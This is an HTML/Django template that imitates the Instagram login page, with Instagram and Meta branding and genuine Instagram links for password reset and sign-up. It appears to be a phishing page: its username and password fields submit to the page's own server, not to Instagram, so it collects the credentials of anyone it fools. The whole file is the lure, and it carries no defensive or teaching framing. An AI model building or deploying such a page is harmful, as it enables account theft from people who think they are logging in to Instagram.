<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link href="/static/img/2_style.css" rel="stylesheet">
    <script src="https://kit.fontawesome.com/03ff58970e.js" crossorigin="anonymous"></script>
</head>
<body>
    <form method="post" action="">
    {% csrf_token %}
    <div class="container" id="main">


        <div id="image">
            <img src="/static/img/insta.png">
        </div>     
        <button class="fb-login-btn" type="button">
            <i class="fa fa-facebook-official fb-icon"></i>
            <span > <a href="https://www.facebook.com/login.php"></a>Log in with Facebook</span>
        </button>
        <div class="separator">
            <div class="line"></div>
            <p class="or">OR</p>
            <div class="line" id="right"></div>
        </div>
        <div>
            <input class="data" type="text" placeholder=" Phone number, username, or email" name="name">
            <input class="data" type="Password" placeholder=" Password" name="password">
            <button class="data" id="login" type="submit">Log In</button>
            
            <a class="same" class="forgot-password" href="https://www.instagram.com/accounts/password/reset/">Forgotten Your password?</a>

    
</div>

</div>
    
    </div>
    <div id="sign" class="box">
        <p class="signup">Don't have an account? <a class="signup" id="signin" href="https://www.instagram.com/accounts/emailsignup/">Sign Up</a></p>
    </div>
    <div>
        <button id="metabutton"><p id="text">from</P><img id="meta" src="/static/img/meta.png"> </button>
    </div>    

</form>
</body>
</html>